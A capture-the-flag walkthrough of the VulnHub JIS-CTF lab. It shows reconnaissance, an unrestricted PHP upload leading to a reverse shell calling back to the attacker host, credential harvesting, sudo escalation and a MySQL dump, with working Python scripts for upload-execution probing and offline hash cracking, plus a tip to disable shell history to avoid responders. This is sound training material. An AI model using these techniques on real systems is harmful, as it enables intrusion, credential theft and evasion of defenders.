[VulnHub] JIS-CTF

Lab environment:
Target: 192.168.0.149
Attacker (Kali): 192.168.0.103

I. Information gathering

1. A quick masscan sweep of all ports finds only 22 and 80 open.

root@redwand:~# masscan -p0-65535 --rate=1000 192.168.0.149
Discovered open port 80/tcp on 192.168.0.149
Discovered open port 22/tcp on 192.168.0.149

2. nmap the two services for version banners and default-script findings.

root@redwand:~# nmap -sC -sV -p22,80 192.168.0.149
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 af:b9:68:38:77:7c:40:f6:bf:98:09:ff:d9:5f:73:ec (RSA)
|   256 b9:df:60:1e:6d:6f:d7:f6:24:fd:ae:f8:e3:cf:16:ac (ECDSA)
|_  256 78:5a:95:bb:d5:bf:ad:cf:b2:f5:0f:c0:0c:af:f7:76 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 8 disallowed entries
| / /backup /admin /admin_area /r00t /uploads
|_/uploaded_files /flag
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-title: Sign-Up/Login Form
|_Requested resource was login.php
MAC Address: 08:00:27:0E:50:45 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

3. Start with port 80: dirb for directories.

root@redwand:~# dirb http://192.168.0.149
---- Scanning URL: http://192.168.0.149/ ----
==> DIRECTORY: http://192.168.0.149/admin_area/
==> DIRECTORY: http://192.168.0.149/assets/
==> DIRECTORY: http://192.168.0.149/css/
==> DIRECTORY: http://192.168.0.149/flag/
+ http://192.168.0.149/index.php (CODE:302|SIZE:1228)
==> DIRECTORY: http://192.168.0.149/js/
+ http://192.168.0.149/robots.txt (CODE:200|SIZE:160)
+ http://192.168.0.149/server-status (CODE:403|SIZE:301)

---- Entering directory: http://192.168.0.149/admin_area/ ----
+ http://192.168.0.149/admin_area/index.php (CODE:200|SIZE:224)

---- Entering directory: http://192.168.0.149/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.0.149/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.0.149/flag/ ----
+ http://192.168.0.149/flag/index.html (CODE:200|SIZE:109)

---- Entering directory: http://192.168.0.149/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

4. whatweb to fingerprint the stack.

root@redwand:~# whatweb 192.168.0.149/login.php
http://192.168.0.149/login.php [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[192.168.0.149], JQuery, PasswordField[pass_word], Script, Title[Sign-Up/Login Form]

5. Walk through the web directories one by one.

  • Login page at http://192.168.0.149/login.php.
  • Directory listing is enabled (directory browsing), and the listing footer leaks the Apache version (ServerSignature On).
  • robots.txt reveals further directories.
  • http://192.168.0.149/flag/ holds the 1st flag.
  • http://192.168.0.149/admin_area/: the page source contains a username/password pair and the 2nd flag.
  • gobuster over each directory with -x txt, to catch stray text files.
root@redwand:~#  gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.0.149 -t 100 -x txt
/assets (Status: 301)
/css (Status: 301)
/js (Status: 301)
/flag (Status: 301)
/flag.txt (Status: 403)
/robots.txt (Status: 200)
/uploaded_files (Status: 301)
/hint.txt (Status: 200)
/server-status (Status: 403)

This turns up hint.txt, which contains the 3rd flag and names the user technawi.
Every other directory returns 403, so the initial information gathering is essentially done.
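The robots.txt entries and the gobuster -x txt pass above are two halves of one idea: every path the site asks crawlers to stay out of is a directory worth requesting, together with the files typically left inside it. The script below is an added example and not part of the original writeup. It parses a robots.txt (the sample is constructed from the 8 entries nmap summarised; the real file's layout is not shown on the page), expands each path into the concrete URLs a scanner would try, and probes them with urllib, recording 403 and 404 as information rather than failures. The list of files tried under each directory is an assumption chosen to match what this box contained.

```python
import re
import urllib.error
import urllib.request

# Constructed sample: the nmap http-robots.txt summary lists these 8 entries;
# the exact formatting of the target's robots.txt is not shown on the page.
ROBOTS_TXT = """User-agent: *
Disallow: /
Disallow: /backup
Disallow: /admin
Disallow: /admin_area   # comments and trailing spaces must not end up in the path
Disallow: /r00t
Disallow: /uploads
Disallow: /uploaded_files
Disallow: /flag
"""

# Assumed list of files worth trying inside every directory the robots file "protects".
# /hint.txt and /flag.txt mirror what gobuster -x txt found on this box.
EXTRA_FILES = ("", "/", "/index.php", "/index.html", "/hint.txt", "/flag.txt")


def parse_robots(text):
    """Return the unique Disallow/Allow paths, in order, with comments and wildcards stripped."""
    paths = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()            # drop comments
        m = re.match(r"(?i)(disallow|allow)\s*:\s*(\S+)", line)
        if not m:
            continue
        path = m.group(2).rstrip("$").split("*", 1)[0]  # '/foo*' and '/foo$' -> '/foo'
        if path.startswith("/") and path not in paths:
            paths.append(path)
    return paths


def expand_candidates(paths, extras=EXTRA_FILES):
    """Turn each directory into the concrete URLs a scanner would request under it."""
    out = []
    for p in paths:
        base = p.rstrip("/")
        for suffix in extras:
            url = (base + suffix) or "/"
            if url not in out:
                out.append(url)
        if base and base + ".txt" not in out:           # /backup -> /backup.txt
            out.append(base + ".txt")
    return out


def probe(base_url, paths, timeout=5):
    """GET each path; map it to the HTTP status (None if the host is unreachable)."""
    results = {}
    for p in paths:
        req = urllib.request.Request(base_url.rstrip("/") + p,
                                     headers={"User-Agent": "robots-probe"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as r:
                results[p] = r.status
        except urllib.error.HTTPError as e:              # 403/404 are still information
            results[p] = e.code
        except urllib.error.URLError:
            results[p] = None
    return results


if __name__ == "__main__":
    candidates = expand_candidates(parse_robots(ROBOTS_TXT))
    for path, code in probe("http://192.168.0.149", candidates).items():
        if code not in (None, 404):
            print(f"{code}  {path}")
```

A 403 on a directory that robots.txt names is not a dead end: it usually means listing is disabled, not that the files inside are unreadable, which is exactly why /flag.txt answered 403 while /hint.txt next to it was readable.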

II. Getting a shell

1. The recovered pair (username admin, password 3v1l_H@ck3r) logs in; the authenticated page offers a file upload.
2. Upload info.php and find it under /uploaded_files: the server executes it, confirming an unrestricted upload with PHP execution.
3. Upload php-reverse-shell to call back to Kali, then upgrade the shell with a python3 pty.

root@redwand:~# rlwrap nc -lvp 6666
listening on [any] 6666 ...
192.168.0.149: inverse host lookup failed: Unknown host
connect to [192.168.0.103] from (UNKNOWN) [192.168.0.149] 56148
Linux Jordaninfosec-CTF01 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 04:28:10 up 52 min,  0 users,  load average: 0.00, 2.25, 3.94
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@Jordaninfosec-CTF01:/$
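Step 2 above proves execution by uploading info.php and viewing it in /uploaded_files. The following is an added example, not code from the writeup: it automates the same check with a less conspicuous probe (a one-line PHP arithmetic echo instead of phpinfo) and tells apart "file executed", "file served as source" and "file not where expected", which are three different findings. The username field name, upload handler path and upload form field are assumptions (the page only shows the pass_word field and the credentials); take them from the login and upload form source.

```python
import http.cookiejar
import urllib.error
import urllib.parse
import urllib.request
import uuid

# Harmless probe: executes to "1337"; the literal source never contains that string,
# so the response tells us unambiguously whether PHP ran.
PROBE_SOURCE = "<?php echo 7*191; ?>"
PROBE_MARKER = str(7 * 191)


def classify_upload_response(status, body):
    """Interpret the response when fetching the uploaded probe back."""
    if status == 404:
        return "missing"        # stored elsewhere, renamed, or never saved
    if status == 403:
        return "forbidden"      # directory denies access: not exploitable as-is
    if PROBE_SOURCE in body:
        return "served_raw"     # file is there but PHP did not run (handler off / extension mapped)
    if PROBE_MARKER in body:
        return "executed"       # arbitrary PHP execution confirmed
    return "unknown"


def build_multipart(field, filename, content, content_type="application/octet-stream"):
    """Hand-rolled multipart/form-data body so no third-party HTTP library is needed."""
    boundary = "----probe" + uuid.uuid4().hex
    body = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
        f"{content}\r\n"
        f"--{boundary}--\r\n"
    ).encode()
    return boundary, body


def probe_upload(base, login_fields, upload_path, field, serve_dir, login_path="/login.php"):
    """Log in, upload the probe, fetch it back from serve_dir and classify the outcome."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    base = base.rstrip("/")
    # 1. session cookie from the login form
    opener.open(base + login_path, urllib.parse.urlencode(login_fields).encode()).read()
    # 2. upload under a random name so repeated runs do not collide
    filename = f"p{uuid.uuid4().hex[:8]}.php"
    boundary, body = build_multipart(field, filename, PROBE_SOURCE)
    req = urllib.request.Request(base + upload_path, data=body,
                                 headers={"Content-Type": f"multipart/form-data; boundary={boundary}"})
    opener.open(req).read()
    # 3. fetch it back from where the page says uploads land
    try:
        with opener.open(f"{base}{serve_dir}/{filename}") as r:
            return filename, classify_upload_response(r.status, r.read().decode(errors="replace"))
    except urllib.error.HTTPError as e:
        return filename, classify_upload_response(e.code, "")


if __name__ == "__main__":
    # Assumed names: "username" (login field), "/index.php" (upload handler) and "file"
    # (upload field) are guesses; only pass_word and the credentials come from the page.
    print(probe_upload("http://192.168.0.149",
                       {"username": "admin", "pass_word": "3v1l_H@ck3r"},
                       upload_path="/index.php", field="file", serve_dir="/uploaded_files"))
```

Returning the random filename matters: the probe is an artefact on the target and should be deleted or noted in the report once the finding is confirmed.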

III. Privilege escalation

1. Identify the interactive user technawi. The empty .sudo_as_admin_successful marker in the home directory means the account has run sudo successfully at some point, so sudo rights for that user are the lead to chase.

www-data@Jordaninfosec-CTF01:/tmp$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
technawi:x:1000:1000:technawi,,,:/home/technawi:/bin/bash
www-data@Jordaninfosec-CTF01:/home/technawi$ ls -al
total 48
drwxr-xr-x 3 technawi technawi 4096 Apr 21  2017 .
drwxr-xr-x 3 root     root     4096 Apr 11  2017 ..
-rw------- 1 technawi technawi 4321 Apr 21  2017 .bash_history
-rw-r--r-- 1 technawi technawi  220 Apr 11  2017 .bash_logout
-rw-r--r-- 1 technawi technawi 3771 Apr 11  2017 .bashrc
drwx------ 2 technawi technawi 4096 Apr 11  2017 .cache
-rw-r--r-- 1 technawi technawi  655 Apr 11  2017 .profile
-rw-r--r-- 1 technawi technawi    0 Apr 11  2017 .sudo_as_admin_successful
-rw------- 1 root     root     6666 Apr 21  2017 .viminfo
-rw-r--r-- 1 root     root     7141 Apr 18  2017 1

2. Checked running processes and the kernel version; nothing usable.
3. grep the whole filesystem for "technawi"; a sensitive file turns up with a username and password.
grep options used:
-r, --recursive    recurse into subdirectories
-i, --ignore-case  ignore case
-n, --line-number  print line numbers
-s, --no-messages  suppress error messages (roughly 2>/dev/null)
--exclude-dir=proc/  skip /proc

www-data@Jordaninfosec-CTF01:/home/technawi$ grep -inrs "technawi" --exclude-dir=proc/ /
/etc/subgid:3:technawi:165536:65536
/etc/mysql/conf.d/credentials.txt:3:username : technawi
/etc/subuid:3:technawi:165536:65536
/etc/passwd:30:technawi:x:1000:1000:technawi,,,:/home/technawi:/bin/bash
/etc/group:5:adm:x:4:syslog,technawi
/etc/group:18:cdrom:x:24:technawi
/etc/group:21:sudo:x:27:technawi
/etc/group:23:dip:x:30:technawi
/etc/group:35:plugdev:x:46:technawi
/etc/group:49:lxd:x:110:technawi
/etc/group:54:technawi:x:1000:
/etc/group:55:lpadmin:x:115:technawi
/etc/group:56:sambashare:x:116:technawi

The credentials are in /etc/mysql/conf.d/credentials.txt:

www-data@Jordaninfosec-CTF01:/home/technawi$ cat /etc/mysql/conf.d/credentials.txt
The 4th flag is : {7845658974123568974185412}

username : technawi
password : 3vilH@ksor

Switch to technawi (a member of the sudo group, per the /etc/group hits above); sudo su - gives root.

www-data@Jordaninfosec-CTF01:/home/technawi$ su - technawi
Password: 3vilH@ksor

technawi@Jordaninfosec-CTF01:~$ sudo su -
[sudo] password for technawi: 3vilH@ksor

root@Jordaninfosec-CTF01:~# whoami
root

Finally, the flag hint.txt pointed at is in /home/technawi/flag.txt, and there is another under /root.

IV. Pulling the database

Since this is a penetration test rather than just a flag hunt, collecting the flags is not the end of the job. MySQL is running on the box, so can its data be exported and brought back?

  • In one terminal, SSH in as root, stop the MySQL service, then start it again with mysqld_safe --skip-grant-tables (while it runs this way anyone who can reach the socket or 127.0.0.1:3306 is effectively database root; restart it normally when done).
root@Jordaninfosec-CTF01:/var/www# mkdir -p /var/run/mysqld
root@Jordaninfosec-CTF01:/var/www# chown -R mysql:mysql /var/run/mysqld
root@Jordaninfosec-CTF01:/var/www# mysqld_safe --skip-grant-tables &
[1] 7262
root@Jordaninfosec-CTF01:/var/www# 2020-02-20T13:14:39.569415Z mysqld_safe Logging to syslog.
2020-02-20T13:14:39.571557Z mysqld_safe Logging to '/var/log/mysql/error.log'.
2020-02-20T13:14:39.573679Z mysqld_safe Logging to '/var/log/mysql/error.log'.
2020-02-20T13:14:39.586356Z mysqld_safe Starting mysqld daemon with databases from /var/lib/mysql
  • In a second terminal, mysql -uroot gets in without a password.
root@Jordaninfosec-CTF01:/tmp# mysql -uroot
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3
Server version: 5.7.17-0ubuntu0.16.04.2 (Ubuntu)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>
  • List the databases:
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
4 rows in set (0.00 sec)
  • Inspect mysql.user (fully qualified, since no default database has been selected):
mysql> select host,user,authentication_string,plugin from mysql.user;
+-----------+------------------+-------------------------------------------+-----------------------+
| host      | user             | authentication_string                     | plugin                |
+-----------+------------------+-------------------------------------------+-----------------------+
| localhost | root             | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | mysql_native_password |
| localhost | mysql.sys        | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE | mysql_native_password |
| localhost | debian-sys-maint | *C46C96C2990814041379A76A744EE3E5026A0D64 | mysql_native_password |
+-----------+------------------+-------------------------------------------+-----------------------+
  • Set root's password to 123456. MySQL 5.7 deprecates PASSWORD(), which is the warning; "Changed: 0" means the stored hash already equalled the new value, i.e. root's password was 123456 before the update. On a 5.7 server the supported form is ALTER USER 'root'@'localhost' IDENTIFIED BY '...' (after FLUSH PRIVILEGES when the server was started with --skip-grant-tables).
mysql> update user set authentication_string=password("123456") where user="root";
Query OK, 0 rows affected, 1 warning (0.00 sec)
Rows matched: 1  Changed: 0  Warnings: 1
mysql>flush privileges;
  • mysqldump the database of interest:
root@Jordaninfosec-CTF01:/tmp# mysqldump -uroot -p sys > sys.sql
Enter password:

That exports sys; the file can be copied back and loaded into a MySQL of the same version for offline analysis. Two caveats: show databases listed only the four built-in schemas (sys is MySQL's own set of diagnostic views), so this box holds no application data to take, and on a real target the schema the web app actually uses is the one to dump. Also, on Ubuntu the maintenance account in /etc/mysql/debian.cnf (root-readable, password included) gets you into a running server without the --skip-grant-tables restart.
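mysql_native_password hashes are unsalted SHA1(SHA1(password)), so the mysql.user dump above can be attacked offline without restarting or even touching the server. The following is an added example, not from the writeup: it recomputes the scheme and runs a dictionary against the three hashes shown; the wordlist is constructed from the credentials found on the box plus a few common defaults. It also explains the "Changed: 0" from the UPDATE, because root's stored hash is exactly PASSWORD('123456'), so the reset changed nothing.

```python
import hashlib

# Hashes copied from the mysql.user output on the page (mysql_native_password, MySQL 5.7).
USER_HASHES = {
    "root": "*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9",
    "mysql.sys": "*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE",
    "debian-sys-maint": "*C46C96C2990814041379A76A744EE3E5026A0D64",
}

# Constructed wordlist: the credentials recovered on the box plus a few defaults.
WORDLIST = ["3v1l_H@ck3r", "3vilH@ksor", "technawi", "123456", "password", "root"]


def mysql_native_hash(password):
    """mysql_native_password: '*' + uppercase hex of SHA1(SHA1(password))."""
    inner = hashlib.sha1(password.encode()).digest()      # raw 20 bytes, not the hex string
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def crack(hashes, wordlist):
    """Offline dictionary attack; non-hex sentinel entries such as mysql.sys are skipped."""
    table = {mysql_native_hash(w): w for w in wordlist}   # unsalted, so one table serves all users
    found = {}
    for user, h in hashes.items():
        if len(h) != 41 or not all(c in "0123456789ABCDEF" for c in h[1:]):
            continue
        if h in table:
            found[user] = table[h]
    return found


if __name__ == "__main__":
    print(crack(USER_HASHES, WORDLIST))   # root's hash is already PASSWORD('123456')
```

Because the scheme is unsalted, one precomputed table covers every user in every dump you ever collect; that is the reason 5.7's deprecation of PASSWORD() and 8.0's move to caching_sha2_password matter, and why a mysql.user dump is worth taking even when the server itself is not otherwise reachable.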

V. Side notes

1. Misled by the wording of hint.txt, the first assumption was that technawi's password sat in a hidden dotfile readable by www-data; a find over every world-readable hidden file turned up no password.

www-data@Jordaninfosec-CTF01:/var/www/html$ cat hint.txt
try to find user technawi password to read the flag.txt file, you can find it in a hidden file ;)
The 3rd flag is : {7645110034526579012345670}

www-data@Jordaninfosec-CTF01:/tmp$ find / -name "\.*" -perm -004 2>/dev/null
....
/etc/cron.weekly/.placeholder
/var/lib/apparmor/profiles/.apparmor.md5sums
/tmp/.XIM-unix
/tmp/.font-unix
/tmp/.X11-unix
/tmp/.ICE-unix
/tmp/.Test-unix
/home/technawi/.sudo_as_admin_successful
/home/technawi/.profile
/home/technawi/.bashrc
/home/technawi/.bash_logout

Retrospective 1:
During the escalation recon, netstat showed MySQL listening on localhost, but nothing under /var/www/html looked like a web-app database config, so the MySQL lead was dropped. In hindsight a listening service's own configuration tree (/etc/mysql here) is the next place to look for credentials.

www-data@Jordaninfosec-CTF01:/var/www/html$ netstat -anput
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      2 192.168.0.149:56148     192.168.0.103:6666      ESTABLISHED 1693/sh
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 192.168.0.149:80        192.168.0.176:49846     ESTABLISHED -
udp        0      0 0.0.0.0:68              0.0.0.0:*

Retrospective 2:
In CTFs, sensitive material often lives in .txt files, so find can enumerate every world-readable .txt on the box in one pass.

www-data@Jordaninfosec-CTF01:/var/www/html$ find / -name "*\.txt" -type f -perm -004 2>/dev/null
...
/usr/src/linux-headers-4.4.0-72/arch/sh/include/mach-ecovec24/mach/partner-jet-setup.txt
/usr/src/linux-headers-4.4.0-72/scripts/spelling.txt
/etc/mysql/conf.d/credentials.txt
/var/www/html/uploaded_files/file.txt
/var/www/html/hint.txt
/var/www/html/robots.txt

2. A small observation
The reverse shell lands in a non-interactive sh, so nothing run from it is written to .bash_history in www-data's home. The usual python pty upgrade into bash, however, starts an interactive shell that writes .bash_history (here /var/www/.bash_history) on exit, leaving a trace for responders. Running unset HISTFILE right after the upgrade prevents that; conversely, a .bash_history owned by www-data under /var/www is a useful indicator for defenders.

www-data@Jordaninfosec-CTF01:/var/www$ exit
exit
$ cd /var/www
$ ls -al
total 16
drwxr-xr-x  3 www-data www-data 4096 Feb 20 05:13 .
drwxr-xr-x 14 root     root     4096 Apr 18  2017 ..
-rw-------  1 www-data www-data  760 Feb 20 05:13 .bash_history
drwxr-xr-x  8 www-data www-data 4096 Apr 21  2017 html